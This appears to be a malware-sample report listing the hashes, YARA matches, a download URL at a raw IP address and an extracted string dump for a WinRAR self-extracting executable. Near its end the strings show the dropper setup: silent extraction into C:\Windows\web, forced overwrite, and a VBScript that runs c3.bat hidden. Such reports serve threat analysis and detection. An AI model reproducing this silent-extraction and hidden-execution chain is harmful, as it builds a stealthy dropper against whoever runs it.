Sample details: d988d11c962c362c7d31719b23dd065f --

Hashes
MD5: d988d11c962c362c7d31719b23dd065f
SHA1: 2050391e822e9750e55c5e53ce7556fd758ebc54
SHA256: fad3e109ecba4913fc2501c3c4cddc238d867f42cac5d7e45242d1ddf4fbb01f
SSDEEP: 6144:0/fAhvV6B8ErzPZp5wdz753RSJT+tLFS9UHWu:QfAv6B8azBwdQT+t0SHn
Details
File Type: PE32
Yara Hits
YRP/VC8_Microsoft_Corporation | YRP/Microsoft_Visual_Cpp_8 | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasDebugData | YRP/IsBeyondImageSize | YRP/HasRichSignature | YRP/maldoc_find_kernel32_base_method_1 | YRP/domain | YRP/contentis_base64 | YRP/anti_dbg | YRP/escalate_priv | YRP/screenshot | YRP/win_registry | YRP/win_token | YRP/win_files_operation | YRP/CRC32_poly_Constant | YRP/RIPEMD160_Constants | YRP/SHA1_Constants |
Source
http://213.183.60.7/b.exe
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
.gfids
@.rsrc
@.reloc
D$(^VQP
f90tCSj\Zj_[f9
EX_^[d
t,j.Xj\f
u'SSSS
UVWj@_;
ulWj@X;
l$$VW3
uUf9.u
D$ j.Y
D$ f9_
t:j_[f9^
u*8O_t
jPXf9E
_^][YY
t)WPUS
j.[]f9
WVj\^f97uMf9w
v9Uj.]
Cj\Xf9
t=j ]f;
f9.t[S
u/j0]f
YY_^][
|$$;|$0
L$$;L$0
_^][YY
_^][YY
YY_^][
SVWj\_W
L$8+L$0
|$<A+|$4
t$$WSj
D$`VPW
jd^+L$8
|$0Pjd
E(3D$h
],3\$p
D$@3E$3u
3T$T3t$X3\$\3D$`
D$$3L$L
L$<3L$8
D$@3D$8
D$43D$
D$@3D$8
D$43D$
3D$<3D$8
|$Tj8[
?vUUj@^+
vzj@[+
t9Uj@]+
\$|AUV3
t	j-Xf
PSSSSSSh 
D$< 	C
D$@4	C
D$DL	C
D$Hd	C
D$L|	C
L$$+D$ 
D$$+L$ 
QQSUVW
_^][YY
D$ SUV
!N|+F|#
s2;V|t-
D$0;D$
9\$ v9
to9.uk
t$09KP
t$0;sP
L$09KPvG
s?;N|t:
F|9|$ sP
F|9|$ sP
9|$0sI
T$$;l$
;L$ |3;
s2;N|t-
F|9\$$sP
t`f9+tN
D$$PjE
ZuDf9V
,__f9~
v&j Yf;
tSf;L$
D$ j Zf
D$,+D$$PV
QD9] t
D$XXVVf
$SUVWj
t;VWj\_
j"Zj,2
t$,SVW
f98t=V
D$$PUV
f9=*!D
.u'f9O
Yj\Yf9
YYj"[f9
tfj"]f9+u
f9(tSVWS
\SUVWjh
Uj"]f;
D$(*1D
Cf9,Ft
tGWSSVU
D$lPh\
v	N+D$
QQSVWd
URPQQhP
;t$,v-
UQPXY]Y[
Tt1jhZ;
t	j-Xf
t0jXXf
~$+~8+
F2jgYf;
u0jAXf;
u0jAXf;
< t1<	t-
Wj0XPV
PPPPPWS
PP9E u:PPVWP
TVhX7C
WWWPWS
u-PWWS
SSVWh 
f9:t!V
QQSWj0j@
PPPPPPPP
v	N+D$
*messages***
CryptProtectMemory
CryptUnprotectMemory
xlistpos
SetDllDirectoryW
SetDefaultDllDirectories
Unknown exception
bad allocation
USER32.dll
GDI32.dll
COMDLG32.dll
ADVAPI32.dll
SHELL32.dll
ole32.dll
AcquireSRWLockExclusive
ReleaseSRWLockExclusive
SHLWAPI.dll
COMCTL32.dll
bad array new length
bad exception
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
 delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
 new[]
 delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator "" 
 Type Descriptor'
 Base Class Descriptor at (
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`h````
xpxxxx
(null)
CorExitProcess
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
GetCurrentPackageId
LCMapStringEx
LocaleNameToLCID
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
?5Wg4p
"B <1=
_hypot
_nextafter
D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.didat$2
.didat$3
.didat$4
.didat$6
.didat$7
.edata
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.didat$5
.gfids$x
.gfids$y
.rsrc$01
.rsrc$02
ShowWindow
GetDlgItem
EnableWindow
SetWindowTextW
GetParent
SetWindowPos
GetSystemMetrics
GetWindowTextW
GetClientRect
GetWindowRect
GetWindowLongW
SetWindowLongW
SetProcessDefaultLayout
GetWindow
LoadStringW
OemToCharBuffA
CharUpperW
GetMessageW
TranslateMessage
DispatchMessageW
PeekMessageW
DefWindowProcW
RegisterClassExW
CreateWindowExW
IsWindow
DestroyWindow
UpdateWindow
MapWindowPoints
CopyRect
LoadCursorW
SendMessageW
ReleaseDC
MessageBoxW
FindWindowExW
GetClassNameW
wvsprintfW
PostMessageW
WaitForInputIdle
IsWindowVisible
DialogBoxParamW
EndDialog
SetDlgItemTextW
GetDlgItemTextW
SendDlgItemMessageW
SetFocus
SetForegroundWindow
GetSysColor
LoadBitmapW
LoadIconW
DestroyIcon
IsDialogMessageW
CreateCompatibleBitmap
CreateCompatibleDC
DeleteDC
DeleteObject
GetDeviceCaps
SelectObject
StretchBlt
CreateDIBSection
GetObjectW
GetOpenFileNameW
GetSaveFileNameW
CommDlgExtendedError
OpenProcessToken
AdjustTokenPrivileges
SetFileSecurityW
LookupPrivilegeValueW
AllocateAndInitializeSid
FreeSid
CheckTokenMembership
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
SHGetMalloc
SHGetPathFromIDListW
SHBrowseForFolderW
SHFileOperationW
ShellExecuteExW
SHGetFileInfoW
SHGetFolderLocation
SHChangeNotify
CreateStreamOnHGlobal
CoCreateInstance
CLSIDFromString
OleInitialize
OleUninitialize
SHAutoComplete
InitCommonControlsEx
sfxrar.exe
GetLastError
SetLastError
GetCurrentProcess
DeviceIoControl
SetFileTime
CloseHandle
CreateDirectoryW
RemoveDirectoryW
CreateFileW
DeleteFileW
CreateHardLinkW
GetShortPathNameW
GetLongPathNameW
MoveFileW
GetFileType
GetStdHandle
WriteFile
ReadFile
FlushFileBuffers
SetEndOfFile
SetFilePointer
SetFileAttributesW
GetFileAttributesW
FindClose
FindFirstFileW
FindNextFileW
GetVersionExW
GetCurrentDirectoryW
GetFullPathNameW
FoldStringW
GetModuleFileNameW
GetModuleHandleW
FindResourceW
FreeLibrary
GetProcAddress
GetCurrentProcessId
ExitProcess
SetThreadExecutionState
LoadLibraryW
GetSystemDirectoryW
CompareStringW
AllocConsole
FreeConsole
AttachConsole
WriteConsoleW
GetProcessAffinityMask
CreateThread
SetThreadPriority
InitializeCriticalSection
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
SetEvent
ResetEvent
ReleaseSemaphore
WaitForSingleObject
CreateEventW
CreateSemaphoreW
GetSystemTime
SystemTimeToTzSpecificLocalTime
TzSpecificLocalTimeToSystemTime
SystemTimeToFileTime
FileTimeToLocalFileTime
LocalFileTimeToFileTime
FileTimeToSystemTime
GetCPInfo
IsDBCSLeadByte
MultiByteToWideChar
WideCharToMultiByte
GlobalAlloc
GetTickCount
LockResource
GlobalLock
GlobalUnlock
GlobalFree
LoadResource
SizeofResource
SetCurrentDirectoryW
GetExitCodeProcess
GetLocalTime
MapViewOfFile
UnmapViewOfFile
CreateFileMappingW
OpenFileMappingW
GetCommandLineW
SetEnvironmentVariableW
ExpandEnvironmentStringsW
GetTempPathW
MoveFileExW
GetLocaleInfoW
GetTimeFormatW
GetDateFormatW
GetNumberFormatW
KERNEL32.dll
GdipAlloc
GdipFree
GdipCloneImage
GdipDisposeImage
GdipCreateBitmapFromStream
GdipCreateBitmapFromStreamICM
GdipCreateHBITMAPFromBitmap
GdiplusStartup
GdiplusShutdown
gdiplus.dll
RaiseException
GetSystemInfo
VirtualProtect
VirtualQuery
LoadLibraryExA
IsProcessorFeaturePresent
IsDebuggerPresent
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoW
QueryPerformanceCounter
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
TerminateProcess
RtlUnwind
EncodePointer
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
LoadLibraryExW
QueryPerformanceFrequency
GetModuleHandleExW
GetModuleFileNameA
GetACP
HeapFree
HeapAlloc
HeapReAlloc
GetStringTypeW
LCMapStringW
FindFirstFileExA
FindNextFileA
IsValidCodePage
GetOEMCP
GetCommandLineA
GetEnvironmentStringsW
FreeEnvironmentStringsW
GetProcessHeap
SetStdHandle
HeapSize
GetConsoleCP
GetConsoleMode
SetFilePointerEx
DecodePointer
 (08@P`p
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AW4RAR_EXIT@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVtype_info@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
vuOuefweV$y
d{a?b\l
c_qQ_}
'_c?!k
r[T%e	
-[jE>y,
xT28FX
401pQm
o1CpQm0
!1Ip	P'w
3z.g-]`
,\`2E&X
om\^\p
SYc61r
u_Agr,
6y3&T.
Gv&F~2
QM~2^~
)'/<4t
ONIHFD
QDFGINO
p)UVVVVVVVVVVU
pRPsttttttttttsPR*TrrrrrrrrrrrrS*
quuuuuuuuuuuuq
90>2Y_ic
:/63Z\hd
;.14[Xae
<JL7]@Wf
=5?8^`jg
**++++++++++'f+++++++++*+*
kkkononnwnon'ynooonoonnnkk
kkooooowuwnw(ywooowoonnnnk
nnnmmmmuuuuu(xuumuuuuunnnn
nmujuujjiiii2xijijjjjjjmnn
mjiihhhhifff2tfffhhfhfgilm
lghdccbrrbbb2rbbbdrbbbeegi
ge88755555553:5545554788eg
vse`44434444443544444444579asv
_abwwwwowwwwwwwwwwwwwwwwwbap
LD?EIQI
LZW\\^\
&XY]{z
RJFJPSPC
UONOTVTM
233333333333333333,y333333333333333333
{|||||||||||||
|||||||||||||{{
uuuuuuuuuuuuuB
uuuuuuuuu}
uuuuuGuuGuuGHuu@}IuHIIIIIIJJJJuJz
~~~zzxIuuHuuG@GGGBD@G@HGG@BDDGDDGGHHIIwyz~~~
~}}zxw||
wxy}}~
"!''7<
!'(77<
RVX\ZP
%(78:>
ORWX\\P
%(89;>
RV`\\R
!&)89;>
RW`]\S
!&(89=>
RW``\S
%&)9;=>
]iffnrslrrl	
+2hjnqtq
/0//1gggnt
ammiosssttm	
.111gkjnq
a]TPPT\ba`U	
&)59;>
cc[RSV`aaa[
$6*!!&59;=
___^__dddd_^
MMMLLMNN
=8IDATx
3;drWR
'a?AHDh 4
4@Z`Z`6
*yMU+Z
)	 a45
~+*X5X5$jI
(_;G.Hf 7
Fr\6$O
us|m_&
D Q$q$-G
,-:6ux
`<$x1	(
3<;AHL
a;D-X7
V&J3eO
1#3otd3
!M9uu,
/JdaAF
F3!iX:]G
-8ix'	
$6e3!T
ceQ&^	gdk
`O/f&Tnx
~b0R_cOW
4Y_cOW	
]_cOWPA
vpenc!h
N4Y_cOWPA
@b	gck(W
*NW[&{
tXTCgP
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
  version="1.0.0.0"
  processorArchitecture="*"
  name="WinRAR SFX"
  type="win32"/>
<description>WinRAR SFX module</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
  <security>
    <requestedPrivileges>
      <requestedExecutionLevel level="asInvoker"            
      uiAccess="false"/>
    </requestedPrivileges>
  </security>
</trustInfo>
<dependency>
  <dependentAssembly>
    <assemblyIdentity
      type="win32"
      name="Microsoft.Windows.Common-Controls"
      version="6.0.0.0"
      processorArchitecture="*"
      publicKeyToken="6595b64144ccf1df"
      language="*"/>
  </dependentAssembly>
</dependency>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
  <application>
    <!--The ID below indicates application support for Windows Vista -->
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
    <!--The ID below indicates application support for Windows 7 -->
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
    <!--The ID below indicates application support for Windows 8 -->
      <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
    <!--The ID below indicates application support for Windows 8.1 -->
      <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
    <!--The ID below indicates application support for Windows 10 -->
      <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
  </application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">
  <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
    <dpiAware>true</dpiAware>
  </asmv3:windowsSettings>
</asmv3:application>
</assembly>
PPADDINGXXPADDINGPADDINGX
0+0<0B0H0M0Y0c0m0y0
8:9w9g=T>>?
/696@6G6N6h6
;5=A=^=
>*>4>R>
>,?E?R?\?g?
1	2*2J2r2
3U3]3l3r3}3
869=9]9r9|9
;J<d<o<.>
2_3C6i7W9
:+:Q:|:
>.?5?p?
(1_1m1
4?5o5~5
:O:h<o<w<
>?>G>R>}>
>&?/?R?^?l?u?
0!1-191B1
2&2-2L2S2Z2a2h2o2v2}2
5!535?5X5_5q5{5
676A6b6i6z6
7;7N7[7m7
:1;@;O;^;
<M=V=`=
1$1T1v1
2 2(20282@2H2P2X2`2h2p2x2
3%303;3F3Q3\3g3r3}3
4"4-484C4N4Y4
4"5V5}5
727D7W7
858O8h8t8
919>9E9K9V9
:!:-:?:L:k:r:x:
=0D0W0\0?112=2A2E2I2M2Q2U2Y2]2a2e2i2m2q2u2y2}2
9.;@;m;
h=p=u=
2U4]4b4
4L5T5Y5Q7
060L0e0
809D9K9R9Y9`9
=!=D=n=
0"0=0X0s0
1(1@1I1
4*414a4i4
5$525C5h5
9-959;9A9
:%:2:R:
;;;E;K;
=<=I=|=
>->?>W>z>
>*?c?r?
E0P0k0
1!1>1K1S1Y1]1}1
1m2,3I3Y3m3
4'4]4u4
8(8H8N8U8h8u8
9*929V9
:7:?:U:h:v:
=%=1=D=K=Z=f=r=~=
>.>C>L>m>
?"?0?;?B?O?U?b?k?t?
0"0(0:0?0T0Z0u0
1+161@1I1W1b1n1w1}1
2"2/2b2v2
454K4a4
6D6J6{6K7S7_7i7u7
;*;h;|;
<;<D<M<
=-===E=
>'>,>7>C>Y>{>
C0J0Q0`0i0s0
1%103@3
4O4S4W4[4_4c4g4k4o4s4w4{4
5.565D5T5_5
636g6t6}6
7&7=7P7w7~7
9&959Q9_9f9l9w9
:":):0:C:L:U:k:s:
;=;Z;j;~;
<M<S<l<
="=-=3=8=>=O=V=
>(>8>E>[>
?C?V?d?v?~?
0B0^0g0r0x0~0
1+11181E1N1[1e1k1|1
2&202:2D2N2X2b2l2v2
3 3*343>3H3R3\3f3p3z3
4!4+454?4I4S4`4n4x4
5&505:5D5N5X5b5l5y5
6!6'6-666=6c6x6
62787F7U7[7b7k7
8&878D8]8r8y8
809Z9e9{9
:":(:=:
;&;3;A;N;^;d;j;p;v;|;
?S?f?y?
4#4(4-4N4S4`4
4U5q5w5
6L7U7]7
9+959F9l9
:+:F:R:a:j:w:
;%;-;2;X;];
<!<)<5<><C<I<S<]<m<}<
<p=D>W>u>
10h0o0t0x0|0
1 1$1(1,1
Z>^>b>f>j>n>r>v>z>~>
3(4/44484<4@4
:&:4:::U:}:
9!:=:]:k:r:x:
;#;+;U;q;
<4<@<E<J<n<z<
===O=[=e=w=|=
P1l1_3m3
8,8I8m8
:=:L:b:x:
:F;M;_;l;~;
<)</<C<
=!=Z=e=Z?
1(1-171<1G1R1f1
5K5P5]5i5
6"6(666?6D6Q6V6c6q6x6
7)868A8K8Q8e8q8
9(9Y:_:q:
=.=^={=
=#>=>W>
4Q4b4|4
=/=>=E=]=d=
0)0D0Q0_0m0x0
7I7P7[7i7p7v7
8F8_8n8z8
9"9'9B9L9h9s9x9}9
:":':,:M:]:y:
;4;W;b;o;
292@2G2N2h2w2
383S3e5
5)6>6L6U6
;&<-<4<;<y<
=<>E>]>o>
0+030\0c0
2-2?2Q2c2u2
.060m0t0y3
:*;W;w;
6&6B6a6
60i0~0
3R3\3w3N6
8!9-9A9M9Y9y9
:+:::>;o;
0-050E0V0
0#1N1s1
2E2Q2]2i2|2
4,5K5|5
8&8<8R8Z8
0+0?0E0
626R6o6
888J8\8y8
\2d2h2l2p2t2x2|2
3<5@5D5H5L5P5T5
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
9D9H9P9d9h9l9p9t9x9|9
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
4 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
8$8,848<8D8L8T8\8d8l8t8|8
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888@8H8P8X8`8h8p8x8
9 9(90989@9H9P9X9`9h9p9x9
>$>,>4><>D>L>T>\>d>l>t>|> ?$?4?8?@?X?h?l?|?
0$0<0L0P0`0d0h0p0
646<6H6h6t6
7(7P7X7`7|7
8<8D8P8p8x8
8(949T9\9h9
:4:@:`:l:
; ;(;0;8;@;H;P;X;`;h;p;t;|;
<0<8<@<P<`<h<|<
=(=D=H=d=h=
>,>0>L>P>`>
? ?<?@?`?h?l?
0(0H0h0
1(1H1h1t1
0L1`1l1p1t1x1|1
3(3@3L3P3T3p3t3|3
809H9d9
: :$:,:0:4:8:<:@:D:H:L:T:X:\:`:d:h:l:p:x:
; ;$;(;,;0;4;8;<;@;D;H;L;T;X;\;`;d;
Path=C:\Windows\web
SavePath
Setup=n.vbs
Silent=1
Overwrite=1
Update=U
c3.bat
@fC33D
Uj1+RS
w};0 ~
q6BQ;Y
Set ws = CreateObject("Wscript.Shell")
on error resume next
ws.run "c:\windows\web\c3.bat",vbhide
wscript.quit